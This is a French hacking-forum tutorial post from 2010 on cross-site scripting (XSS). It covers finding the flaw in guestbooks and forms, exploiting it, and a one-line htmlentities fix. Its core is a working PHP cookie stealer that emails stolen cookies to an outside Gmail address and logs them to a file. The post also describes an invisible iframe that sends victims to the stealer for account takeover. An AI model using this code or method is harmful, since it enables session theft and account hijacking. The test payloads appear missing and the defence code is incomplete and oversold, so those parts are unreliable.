B0T - T3AM Index du Forum
B0T - T3AM
Meilleur des team de hacke
 
B0T - T3AM Index du ForumFAQRechercherS’enregistrerConnexion
:: faille xss ::

 
Poster un nouveau sujet   Répondre au sujet    B0T - T3AM Index du Forum -> Hacking ... -> [Tuto] Hacking
Sujet précédent :: Sujet suivant  
Auteur Message
UNTOXTION
.:Administrateur:.
.:Administrateur:.

Hors ligne

Inscrit le: 22 Mai 2010
Messages: 82

MessagePosté le: Mer 7 Juil - 23:50 (2010)    Sujet du message: faille xss Répondre en citant

Aujourdhui je vais vous parler d'une faille extrêmement rependue : La faille XSS,(Cross Site Scripting) on a changé le nom car on pouvais confondre avec CSS (Cascading Style Sheet).


La faille XSS est une faille visant à injecter un code javascript permettant plusieurs choses dont le vol de cookies 


Comment trouver cette faille ?


Cette faille existe en général dans les Livres D'or, les forums et les formulaires d'inscription parfois.


Attaquons nous au site : monsite.fr (Un exemple) : http://www.monsite.fr/livredor.php?id=1


Comment savoir si la faille est présente ?


Laissez un message dans le formulaire avec par exemple :


PSEUDO :  
EMAIL @dark-nico.com (Ne fonctionne pas souvent.)
MESSAGE : 


Si vous voyez qu'un messagebox (Boite de message) qui apparait, la faille est présente et il faut proteger le site web (Et oui, nous n'allons pas nous amuser à tout detruire !)


Comment ça marche ?


En envoyant le formulaire précèdent, vous avez ajouté dans la page, une partie de code HTML et donc, le code sera exécuté dans la page.


Code:




Votre Pseudo :


Email :
@email.fr
Votre commentaire :








Risque D'exploitation et exemples


Maintenant que vous avez trouvé la faille, un pirate informatique avec de mauvaises intentions peut voler les cookies des membres avec un code PHP dans cet exemple, qui est trouvable très facilement sur google.


Code:
<?PHP
// Cookie Stealer by n3xg3n
$cookie = $HTTP_GET_VARS["cookie"];
mail("pricemustsuk@gmail.com", "cookie stealer report", $cookie);
$useragent = $_SERVER["HTTP_USER_AGENT"];
$time = date("F j, Y, g:i:s a O [U]"); 


$message = "Time: ".$time."\nIP: ".$ip."\nUser Agent: ".$useragent."\nCookie:".$cookie."\n\n\n";


// Write to file
$file = fopen('cookies.txt', 'a');
fwrite($file, $message);


// A Delete or clean up the cookies.txt
$key = $HTTP_GET_VARS["key"];
if ($key == "DEL-KEY-HERE") {
unlink('cookies.txt');
}


?>


Ensuite, l'utilisateur mal intentionné peux créer un Iframe invisible (Voir : http://en.wikipedia.org/wiki/HTML_element) qui fera une redirection vers le voleur de cookie, et ainsi, le pirate pourra ce connecter avec n'importe quel compte !




Protection contre la faille XSS


Il suffit d'interdire toutes les balises HTML dans votre page, il faut placer un code de ce genre dans votre page web :


Code:
function noremorexss($chaine) {
return htmlentities($chaine, ENT_QUOTES);



Ainsi : il n'y aura pas de possibilité d'exploitation Cross Site Scripting.


Il y a beaucoup de failles XSS diverses.
Ici nous donnons un exemple connu.


Revenir en haut
Publicité






MessagePosté le: Mer 7 Juil - 23:50 (2010)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    B0T - T3AM Index du Forum -> Hacking ... -> [Tuto] Hacking Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 
Sauter vers:  

Index | créer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
onyx © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com